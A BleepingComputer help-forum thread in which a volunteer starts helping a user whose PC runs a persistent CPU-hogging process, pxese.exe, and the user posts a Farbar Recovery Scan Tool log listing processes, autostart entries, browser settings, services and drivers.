Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Program using 100% of my processor. Can't get rid of it!


  • This topic is locked This topic is locked
17 replies to this topic

#1 Hercilio

Hercilio

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Brazil
  • Local time:03:55 AM

Posted 03 August 2017 - 10:48 AM

Hi

My name is Hercilio I'm from Brazil and it seems that I am having the same problem as the person in this topic (https://www.bleepingcomputer.com/forums/t/652955/windows-10exe-taking-up-100-processor-usage/). I tried to post it there, but it seems I don't have permission, anyway, some program just started taking 100% of my processor usage: "pxese.exe wzglxt Microsoft 基础类应用程序" if i go to file location it takes me to: "C:\Users\Hercilio\AppData\Roaming" and the file is there as: "pxese.exe".

I tried to scan it with Windows Defender and IOBIT anti-malware with no success, tried to delete it and no success either, it just comes back.

I disabled it on start up and rebooted my PC and it seems to be not opening anymore but the file is still there.

Image of the file and the process on my computer. 
https://justpaste.it/19obe

Any help? (Sorry for any mispelled word, english is not my main language)


Edited by hamluis, 03 August 2017 - 11:12 AM.
Moved from MRL to Am I Infected - Hamluis.


BC AdBot (Login to Remove)

 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:55 AM

Posted 03 August 2017 - 11:48 AM

Hi Hercilio :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens;
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you;
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system;
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!;
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced;
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules;
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process;
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone;
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread;
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Scan mode
Follow the instructions below to download and execute a scan on your system with FRST, and provide the logs in your next reply.
  • Download the right version of FRST for your system:
    • FRST 32-bit
    • FRST 64-bit
      Note: Only the right version will run on your system, the other will throw an error message. So if you don't know what your system's version is, simply download both of them, and the one that works is the one you should be using.
  • Move the executable (FRST.exe or FRST64.exe) on your Desktop;
  • Right-click on the executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds;
  • Make sure the Addition.txt box is checked;
  • Click on the Scan button;
    KSJwAxg.png
  • On completion, two message box will open, saying that the results were saved to FRST.txt and Addition.txt, then open two Notepad files;
  • Copy and paste the content of both FRST.txt and Addition.txt in your next reply;

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 Hercilio

Hercilio
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Brazil
  • Local time:03:55 AM

Posted 03 August 2017 - 01:40 PM

Resultado do exame da Farbar Recovery Scan Tool (FRST) (x64) Versão: 31-07-2017
Executado por Hercílio (administrador) em PC-NETINHO (03-08-2017 14:20:59)
Executando a partir de C:\Users\Hercílio\Desktop
Perfis Carregados: Hercílio (Perfis Disponíveis: Hercílio)
Platform: Windows 10 Home Single Language Versão 1703 (X64) Idioma: Português (Brasil)
Internet Explorer Versão 11 (Navegador padrão: Chrome)
Modo da Inicialização: Normal
 
==================== Processos (Whitelisted) =================
 
(Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.)
 
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe
(IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Intel Corporation) C:\Windows\System32\ibtsiva.exe
(SuperBoost Software) C:\Program Files (x86)\SuperBoost\SuperBoost Software Updater\SuperBoostUpdater.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(IObit) C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFTips.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DDVRulesProcessor.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\AMD\CNext\CCCSlim\MOM.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\AMD\CNext\CCCSlim\CCC.exe
(Dell Inc.) C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe
() C:\Users\Hercílio\AppData\Roaming\Realtek\Realtek\audiobg.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DDVDataCollector.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DDVCollectorSvcApi.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\atiw.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
 
==================== Registro (Whitelisted) ====================
 
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.)
 
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9197568 2017-07-14] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1483264 2017-07-14] (Realtek Semiconductor)
HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [5793048 2014-10-08] (Dell Inc.)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [322712 2014-10-09] (Intel Corporation)
HKLM\...\Run: [TrueColor UI] => C:\Program Files\TrueColor\TrueColorUI.exe [19491792 2014-12-24] (Entertainment Experience)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-11-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [DropboxOEM] => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [462160 2014-09-02] ()
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-01-21] (Microsoft Corporation)
HKLM-x32\...\Run: [Discord] => C:\ProgramData\SquirrelMachineInstalls\Discord.exe [50343608 2016-09-29] (Hammer & Chisel, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-03-15] (Oracle Corporation)
HKLM-x32\...\Run: [IObit Malware Fighter] => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe [5232928 2017-05-19] (IObit)
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53130368 2016-05-17] (Skype Technologies S.A.)
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Run: [DAEMON Tools Ultra Agent] => C:\Program Files\DAEMON Tools Ultra\DTAgent.exe [4338880 2016-02-02] (Disc Soft Ltd)
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Run: [Discord] => C:\Users\Hercílio\AppData\Local\Discord\app-0.0.297\Discord.exe [64290304 2017-01-04] (Hammer & Chisel, Inc.)
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Run: [Advanced SystemCare 10] => C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe [3924256 2017-05-17] (IObit)
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Run: [psexe] => C:\Users\Hercílio\AppData\Roaming\pxese.exe [1835008 2017-08-03] ()
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Policies\Explorer: [NolowDiskSpaceChecks] 1
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\MountPoints2: {34d93e43-405d-11e7-82c4-f8a96363eab2} - "D:\setup.exe" 
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\MountPoints2: {c4accacd-5b5e-11e7-82c7-f8a96363eab2} - "E:\stp-tww.exe" 
HKU\S-1-5-18\...\Run: [psexe] => C:\WINDOWS\SysWOW64\config\systemprofile\AppData\Roaming\pxese.exe [1835008 2017-08-03] ()
GroupPolicy: Restrição <==== ATENÇÃO
CHR HKLM\SOFTWARE\Policies\Google: Restrição <==== ATENÇÃO
CHR HKU\S-1-5-21-459013025-3067968454-1995941679-1001\SOFTWARE\Policies\Google: Restrição <==== ATENÇÃO
 
==================== Internet (Whitelisted) ====================
 
(Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.)
 
Hosts: 0.0.0.0 keystone.mwbsys.com
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{429515b6-e4de-4b9e-8e87-402facf1f602}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{5904a231-e599-478b-a188-baa8c1e70b56}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{b4b36175-a2a3-4de1-ba12-05cfc1288d5b}: [DhcpNameServer] 8.8.4.4 8.8.8.8
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com.br/
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://dell13.msn.com/?pc=DCJB
SearchScopes: HKLM -> DefaultScope {13CA4886-6CB2-464C-889F-EB151E10E28B} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {13CA4886-6CB2-464C-889F-EB151E10E28B} URL = 
SearchScopes: HKU\S-1-5-21-459013025-3067968454-1995941679-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE04
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer.dll [2017-03-28] (IObit)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2010-01-21] (Microsoft Corporation)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-01-16] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2010-01-21] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\ssv.dll [2017-05-25] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-01-16] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\jp2ssv.dll [2017-05-25] (Oracle Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
 
FireFox:
========
FF DefaultProfile: 1yl2b5e1.default
FF ProfilePath: C:\Users\Hercílio\AppData\Roaming\Mozilla\Firefox\Profiles\1yl2b5e1.default [2017-08-03]
FF user.js: detected! => C:\Users\Hercílio\AppData\Roaming\Mozilla\Firefox\Profiles\1yl2b5e1.default\user.js [2017-07-14]
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32.dll [2015-11-07] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.131.2 -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\dtplugin\npDeployJava1.dll [2017-05-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.131.2 -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\plugin2\npjp2.dll [2017-05-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-01-10] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-04] (Adobe Systems Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR DefaultSearchURL: Default -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms}
CHR Profile: C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default [2017-08-03]
CHR Extension: (Free Download Manager Chrome extension) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\ahmpjcflkgiildlgicmcieglgoilbfdp [2017-03-03]
CHR Extension: (Google Drive) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
CHR Extension: (YouTube) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Search) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2017-08-01]
CHR Extension: (Documentos Google off-line) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-14]
CHR Extension: (AdBlock) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-07-19]
CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-10]
CHR Extension: (Simple EPUB Reader) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\ojhbgcchcbdjdenibfmjofobklkkhofc [2016-11-14]
CHR Extension: (Gmail) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-27]
CHR Extension: (Chrome Media Router) - C:\Users\Hercílio\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-07-13]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]
 
==================== Serviços (Whitelisted) ====================
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
R2 AdvancedSystemCareService10; C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe [462624 2017-03-21] (IObit)
S4 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
R2 DDVCollectorSvcApi; C:\Program Files\Dell\DellDataVault\DDVCollectorSvcApi.exe [206712 2017-06-20] (Dell Inc.)
R2 DDVDataCollector; C:\Program Files\Dell\DellDataVault\DDVDataCollector.exe [3296632 2017-06-20] (Dell Inc.)
R2 DDVRulesProcessor; C:\Program Files\Dell\DellDataVault\DDVRulesProcessor.exe [217464 2017-06-20] (Dell Inc.)
S4 Dell Customer Connect; C:\Program Files (x86)\Dell Customer Connect\DCCService.exe [137968 2015-09-22] (Dell Inc.)
S4 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [153960 2016-04-29] (Dell)
S4 DellProdRegManager; C:\Program Files (x86)\Dell Product Registration\regmgrsvc.exe [278568 2014-10-31] (Aviata, Inc.)
S4 DellUpdate; C:\Program Files (x86)\Dell Update\DellUpService.exe [237272 2015-08-27] (Dell Inc.)
S3 Disc Soft Ultra Bus Service; C:\Program Files\DAEMON Tools Ultra\DiscSoftBusService.exe [1439424 2016-02-02] (Disc Soft Ltd)
S2 Ds3Service; C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpService.exe [389632 2016-01-10] (Scarlet.Crush Productions) [Arquivo não assinado]
S4 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation)
S4 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [8704 2015-09-02] (Hi-Rez Studios) [Arquivo não assinado]
S4 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [18584 2014-10-09] (Intel Corporation)
S4 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [382448 2017-02-24] (Intel Corporation)
R2 IMFservice; C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe [1766176 2017-05-19] (IObit)
S4 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [630048 2016-10-13] (Intel® Corporation)
S4 IntelUSBoverIP; C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe [394184 2014-10-15] (Intel)
R2 IObitUnSvr; C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe [360736 2017-03-28] (IObit)
S4 iumsvc; C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [178312 2015-09-25] (Intel Corporation)
S4 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [177440 2016-12-05] (Intel Corporation)
S4 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2016-08-04] ()
S4 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [320512 2017-07-14] (Realtek Semiconductor)
R2 sgbupt; C:\Program Files (x86)\SuperBoost\SuperBoost Software Updater\SuperBoostUpdater.exe [2600256 2016-10-21] (SuperBoost Software)
R2 SupportAssistAgent; C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe [52696 2017-06-28] (Dell Inc.)
S4 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [263264 2017-02-16] (Synaptics Incorporated)
S4 TrueColorALS; C:\Program Files\TrueColor\TrueColorALS.exe [94160 2014-12-24] ()
S4 updater; C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe [464384 2016-01-10] (Nefarius Software Solutions) [Arquivo não assinado]
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-06-20] (Microsoft Corporation)
S2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.3.227\WsAppService.exe [492768 2017-06-21] (Wondershare)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3732896 2016-08-04] (Intel® Corporation)
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
 
===================== Drivers (Whitelisted) ======================
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.)
R2 atksgt; C:\WINDOWS\System32\DRIVERS\atksgt.sys [312480 2015-06-11] ()
R3 DDDriver; C:\WINDOWS\system32\drivers\DDDriver64Dcsa.sys [32960 2017-04-11] (Dell Inc.)
R3 DellProf; C:\WINDOWS\system32\drivers\DellProf.sys [32568 2017-04-11] (Dell Computer Corporation)
R3 DellRbtn; C:\WINDOWS\System32\drivers\DellRbtn.sys [22864 2017-07-14] (OSR Open Systems Resources, Inc.)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [129152 2016-04-24] (Samsung Electronics Co., Ltd.)
R3 dtultrascsibus; C:\WINDOWS\System32\drivers\dtultrascsibus.sys [30264 2017-05-27] (Disc Soft Ltd)
R3 dtultrausbbus; C:\WINDOWS\System32\drivers\dtultrausbbus.sys [47672 2017-07-13] (Disc Soft Ltd)
R3 ETDSMBus; C:\WINDOWS\System32\drivers\ETDSMBus.sys [32840 2017-07-14] (ELAN Microelectronic Corp.)
R1 HWiNFO32; C:\WINDOWS\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-07-14] (REALiX™)
R3 iaLPSS_GPIO; C:\WINDOWS\System32\drivers\iaLPSS_GPIO.sys [46856 2017-07-14] (Intel Corporation)
S3 iaLPSS_SPI; C:\WINDOWS\System32\drivers\iaLPSS_SPI.sys [100856 2014-06-10] (Intel Corporation)
S3 iaLPSS_UART2; C:\WINDOWS\System32\drivers\iaLPSS_UART2.sys [143864 2014-06-10] (Intel Corporation)
R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [252936 2017-07-14] (Intel Corporation)
R1 IMFCameraProtect; C:\WINDOWS\system32\drivers\IMFCameraProtect.sys [44096 2017-03-17] (IObit.com)
R3 IMFDownProtect; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win10_amd64\IMFDownProtect.sys [39288 2017-03-06] (IObit.com)
S4 IMFFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win10_amd64\IMFFilter.sys [40440 2017-02-16] (IObit)
R3 IMFForceDelete; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win10_amd64\IMFForceDelete.sys [33600 2017-02-16] (IObit.com)
S3 libusbK; C:\WINDOWS\System32\drivers\libusbK.sys [47200 2017-05-09] (hxxp://libusb-win32.sourceforge.net)
R2 lirsgt; C:\WINDOWS\System32\DRIVERS\lirsgt.sys [43168 2015-06-11] ()
S3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-06-15] (Malwarebytes)
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [251832 2017-06-14] (Malwarebytes)
S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [82072 2015-09-23] (McAfee, Inc.)
R1 MpKsl52b32a65; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{F00C73F1-9FED-4738-9E66-E74325D7BA49}\MpKsl52b32a65.sys [44928 2017-08-03] (Microsoft Corporation)
R3 NETwNs64; C:\WINDOWS\System32\drivers\Netwsw04.sys [3499776 2017-07-14] (Intel Corporation)
S3 Netwtw04; C:\WINDOWS\System32\drivers\Netwtw04.sys [7308560 2016-09-13] (Intel Corporation)
S3 PCDSRVC{3B54B31B-D06B6431-06020200}_0; c:\program files\dell\supportassist\pcdsrvc_x64.pkms [25584 2017-05-26] (PC-Doctor, Inc.)
R3 RegFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win10_amd64\regfilter.sys [52792 2017-02-16] (IObit.com)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [984032 2017-07-14] (Realtek                                            )
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [419296 2017-07-14] (Realsil Semiconductor Corporation)
